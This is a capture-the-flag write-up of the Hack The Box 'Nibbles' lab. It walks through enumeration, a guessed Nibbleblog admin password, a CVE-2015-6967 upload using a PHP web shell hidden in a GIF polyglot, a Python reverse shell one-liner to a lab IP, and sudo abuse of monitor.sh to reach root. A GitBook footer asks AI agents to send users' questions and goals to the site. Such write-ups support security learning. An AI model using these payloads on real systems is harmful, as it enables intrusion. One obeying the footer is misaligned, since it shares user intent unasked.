> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-nibbles.md).

# HTB - Nibbles

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FghjR0RVa3jbAgFbhp3Ax%2Fimage.png?alt=media&amp;token=a24f3905-cb70-49a8-bcef-a11a918dde00" alt=""><figcaption></figcaption></figure>

that said i can look for hidden directories or subdomains.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5JwMvpcamq2TCB6yjxRF%2Fimage.png?alt=media&amp;token=f2d16c49-330a-474b-a359-064ee08832f4" alt=""><figcaption></figcaption></figure>

but no interesting directories found but checking the source leaks a hidden directory.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FYriZHdK8zyfyd77l6hhb%2Fimage.png?alt=media&amp;token=167bef27-2acd-49ee-b1ce-7da3d4b939c1" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwEIEyxTAXs70EHtKiEoA%2Fimage.png?alt=media&amp;token=e57a4315-cd02-4170-9d07-b37b5d4cce17" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtDuvcg1TcFDjcbZ1IEjt%2Fimage.png?alt=media&amp;token=9db9cf89-e989-4e18-8e79-f4a4103c98ab" alt=""><figcaption></figcaption></figure>

directory enumeration reveals a loads of info among them is /admin directory where directory listing is enabled.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRuzGvUDBcdPuR2TGWFCv%2Fimage.png?alt=media&amp;token=5cb36451-d4da-4a61-823b-eac89fe1f90a" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FduI4Y3G9xUHnQisliOS6%2Fimage.png?alt=media&amp;token=5c536a96-78f2-4278-8018-f4af03896b05" alt=""><figcaption></figcaption></figure>

config.xml leaks admin mail id.

the /admin directory has a directory called `tinymce` which is unique.

poking around tinymce is a text editor but dont know how to poke around on this.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FHdXuEhIFyPr1Zoqkk4be%2Fimage.png?alt=media&amp;token=d09757ff-3dbf-403e-a0c5-6e67d6bc5e0a" alt=""><figcaption></figcaption></figure>

looking for nibble blog it says nibble blog is a CMS

reading the readme reveals the version of nibbleblog

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFK2r9ujNNX7tdJe0e05A%2Fimage.png?alt=media&amp;token=65b29800-dc3f-4757-9a84-2587d1b84612" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FpVxKLmY2LYOlOBUwPBgH%2Fimage.png?alt=media&amp;token=69dcf1e5-c477-4a61-bf16-6e0f7116b2b8" alt=""><figcaption></figcaption></figure>

trying the default creds like `admin : admin` do not work here but admin user is a valid user.

but poking around a bit i found `nibbles` as password.

### CVE-2015-6967

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FtJG35ParD7qEYnrIJlLJ%2Fimage.png?alt=media&amp;token=5210498d-1336-41d9-92cf-6d43d0e1b5cd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FyzClxLV5vADtMovUCwBN%2Fimage.png?alt=media&amp;token=0730c128-2978-451f-9592-3446af380406" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFRklnvPYtue0Abgh0yFx%2Fimage.png?alt=media&amp;token=3b45df00-00a2-4153-b93b-ed8f047ab933" alt=""><figcaption></figcaption></figure>

```bash
──(ajay㉿kali)-[~]
└─$ cat shell.php 
<?php system($_GET['c']); ?>
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3OYrCWLe5vVhAgT9Enix%2Fimage.png?alt=media&amp;token=ae074707-bb13-4cb7-b691-ceccdc133def" alt=""><figcaption></figcaption></figure>

uploading shell.php throws resize errors probably it expects a image file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7F7gHBVOg49SMOzQNaHR%2Fimage.png?alt=media&amp;token=3520f9ff-90d8-4664-946c-86806cfac28d" alt=""><figcaption></figcaption></figure>

that said i will create a ployglot file which contains a image and php.

#### Image PHP polyglot

```bash
echo 'GIF89a<?php system($_GET["cmd"]); ?>' > image.php
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfdliBfBqQA2yRY88JIA9%2Fimage.png?alt=media&amp;token=41e9e763-0753-42db-95fc-ac075d9d25e7" alt=""><figcaption></figcaption></figure>

uploading again gives warnings but the upload succeeded can be confirmed by accessing it.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FrIeDNYWIc7j9T30pxXND%2Fimage.png?alt=media&amp;token=8447d8af-b908-47a5-9dc8-dd0a993b8a56" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FATwgHfOQ8qo7dq2hQ4Ns%2Fimage.png?alt=media&amp;token=72c9c405-9db6-42b0-ae17-f6d142c2886d" alt=""><figcaption></figcaption></figure>

now i will get a reverse shell.

```bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.49",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvkOXIw10K0Kanboa5NVG%2Fimage.png?alt=media&amp;token=a37a0bdd-d2bc-4ae3-b3bc-d98a524f4912" alt=""><figcaption></figcaption></figure>

## Shell as Nibbler

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFwskJ6vrVlcRMzoDnWV5%2Fimage.png?alt=media&amp;token=a78a26e8-06b1-47de-b6e7-cc72cff899d2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FU7qhUg9viLMuo3YRRuCN%2Fimage.png?alt=media&amp;token=236588ed-0feb-4a67-a06a-69095ad5a448" alt=""><figcaption></figcaption></figure>

there is a zip file called personal.zip in the nibbler home directory which looks interesting

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FW4HvU5uQXZw1TRn0m2tc%2Fimage.png?alt=media&amp;token=70711db3-e248-4437-afa3-94cf76210d9b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsmF6lbD5NQ3FqFqzccNb%2Fimage.png?alt=media&amp;token=40e26620-808e-4d13-80a0-f6a0da349705" alt=""><figcaption></figcaption></figure>

nibbler can run `monitor.sh` as root.

since the personal.zip is a archive and there is no personal directory i will manually create a personal directory and stuff with adding a monitor.sh that starts a bash shell. but first i will remove the personal zip file extracted.

```bash
nibbler@Nibbles:/home/nibbler$ mkdir personal
mkdir personal
nibbler@Nibbles:/home/nibbler$ cd personal
cd personal
nibbler@Nibbles:/home/nibbler/personal$ mkdir stuff
mkdir stuff
nibbler@Nibbles:/home/nibbler/personal$ cd stuff
cd stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ cat > monitor.sh << 'EOF'
#!/bin/bash
cat > monitor.sh << 'EOF'
> #!/bin/bash
> bash
bash
> EOF
EOF

nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo ./monitor.sh
sudo ./monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# 
```

## Shell as Root

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F5P8Vbl8ZiQj4YgYqh6F0%2Fimage.png?alt=media&amp;token=9effdb05-f508-4adb-ac52-8ec20a77b4b8" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-nibbles.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
